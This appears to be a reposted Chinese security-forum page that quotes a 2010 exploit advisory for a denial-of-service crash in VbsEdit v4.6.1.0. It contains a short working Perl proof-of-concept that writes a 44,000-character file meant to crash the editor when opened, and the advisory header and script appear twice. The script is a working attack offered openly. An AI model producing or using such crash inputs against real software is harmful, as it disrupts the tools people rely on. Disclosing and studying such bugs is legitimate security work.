-
-
[转帖]VbsEdit v4.6.1.0 Denial of Service
-
发表于: 2010-8-19 04:02 3751
-
# Exploit Title: VbsEdit v4.6.1.0 DoS
# Date: 8 / 12 / 2010
# Author: C G Tan
# Software Link: http://www.vbsedit.com/tr_download.asp
# Version: v4.6.1.0 32-bit Version
# Tested on: Windows XP SP 2, Windows XP SP 3
# CVE : N / A
# Description : This is the latest version from the official website.
#!/usr/bin/perl
#Opening crash.vbs in VbsEdit will cause VbsEdit to crash consistently.
open FILE, ">crash.vbs";
print FILE 'a'x44000;
close FILE;
# Date: 8 / 12 / 2010
# Author: C G Tan
# Software Link: http://www.vbsedit.com/tr_download.asp
# Version: v4.6.1.0 32-bit Version
# Tested on: Windows XP SP 2, Windows XP SP 3
# CVE : N / A
# Description : This is the latest version from the official website.
#!/usr/bin/perl
#Opening crash.vbs in VbsEdit will cause VbsEdit to crash consistently.
open FILE, ">crash.vbs";
print FILE 'a'x44000;
close FILE;
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
看原图
赞赏
雪币:
留言: